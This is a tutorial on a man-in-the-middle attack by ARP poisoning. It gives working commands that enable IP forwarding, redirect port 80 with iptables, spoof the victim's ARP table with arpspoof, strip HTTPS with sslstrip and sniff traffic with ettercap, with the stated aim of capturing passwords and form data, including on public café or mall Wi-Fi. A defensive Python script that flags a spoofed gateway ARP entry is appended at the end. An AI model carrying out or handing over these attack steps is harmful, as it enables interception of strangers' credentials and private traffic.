In this tutorial we will address the type of attack known as Man in the Middle. This test "poisons" the ARP table of the victim, causing the attacking machine (our machine) to pass itself off as the router, so that we can intercept the traffic and have access to sensitive data exchanged between the two actors.
Exploiting ARP poisoning is the fastest method of getting into the communication path between two machines and intercepting the information sent between them, giving access to confidential data, passwords, and traffic reports. This method applies only to Ethernet networks, i.e. it is limited to internal networks, be they business, residential, or even the free Wi-Fi in the food court of the mall or the coffee shop you like to visit.
Three actors take part in this example:
192.168.1.52 – attacking machine with Debian 8 Jessie
192.168.1.57 – victim with Windows 8.1; it could be any other OS: Windows, Linux or OS X
192.168.1.1 – Router as Gateway
2. Preparing the attack.
In this example we need to keep 3 terminals open.
Open the first terminal. Now let's activate packet forwarding.
# echo 1 > /proc/sys/net/ipv4/ip_forward
Now let's redirect all packets that arrive on port 80 of our machine to port 7777:
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 7777
Now let's start arpspoof to poison the ARP table of the victim. The syntax is as follows:
# arpspoof -i INTERFACE -t VICTIM-IP GATEWAY-IP
In our case, since I am running the attack over a wireless interface, the command would be:
# arpspoof -i wlan0 -t 192.168.1.57 192.168.1.1
We'll leave this terminal open, poisoning the ARP table of the victim. Next, let's set sslstrip to listen on port 7777.
Open another terminal and as root, type:
# sslstrip -l 7777
sslstrip is now in listening mode and receives everything that arrives on port 7777.
Open the third terminal and as root, type:
# ettercap -Tq -i wlan0
Ettercap is a powerful network sniffer; it will show us everything that passes through the wlan0 interface of our machine. The victim machine is now fully monitored, and we will intercept every packet it sends to the gateway.
Now we wait for the host to access any website and fill out a form. Remember that Ettercap and sslstrip will capture everything, not just passwords.
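How the poisoning described above shows up on the victim, as an added example that is not part of the original tutorial: this Python script parses Windows `arp -a` output and flags a gateway entry whose MAC differs from a known baseline or is shared with another host. The sample tables and MAC addresses are constructed for illustration; only the three IP addresses come from the tutorial.

```python
import re
from collections import defaultdict

# Constructed sample `arp -a` output from the victim (192.168.1.57); MACs are made up.
ARP_BEFORE = """\
Interface: 192.168.1.57 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-01     dynamic
  192.168.1.52          00-11-22-33-44-52     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
# Same table after the gateway entry has been poisoned (constructed).
ARP_AFTER = ARP_BEFORE.replace("00-11-22-33-44-01", "00-11-22-33-44-52")

ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\b",
    re.I | re.M,
)

def parse_arp(text):
    """Return {ip: mac} for the unicast entries in Windows `arp -a` output."""
    table = {}
    for ip, mac in ENTRY.findall(text):
        mac = mac.lower()
        if mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e"):
            continue  # broadcast and IPv4 multicast MACs are shared by design
        table[ip] = mac
    return table

def find_poisoning(table, gateway, baseline_mac=None):
    """Return findings that suggest the gateway's ARP entry was spoofed."""
    findings = []
    gw_mac = table.get(gateway)
    if baseline_mac and gw_mac and gw_mac != baseline_mac.lower():
        findings.append(f"gateway {gateway} moved from {baseline_mac} to {gw_mac}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if gateway in ips and len(ips) > 1:
            others = ", ".join(sorted(ip for ip in ips if ip != gateway))
            findings.append(f"gateway {gateway} shares MAC {mac} with {others}")
    return findings

if __name__ == "__main__":
    baseline = parse_arp(ARP_BEFORE)["192.168.1.1"]
    for finding in find_poisoning(parse_arp(ARP_AFTER), "192.168.1.1", baseline):
        print("ALERT:", finding)
```

A shared MAC can also be legitimate (proxy ARP, for instance), so the baseline mismatch is the stronger of the two signals.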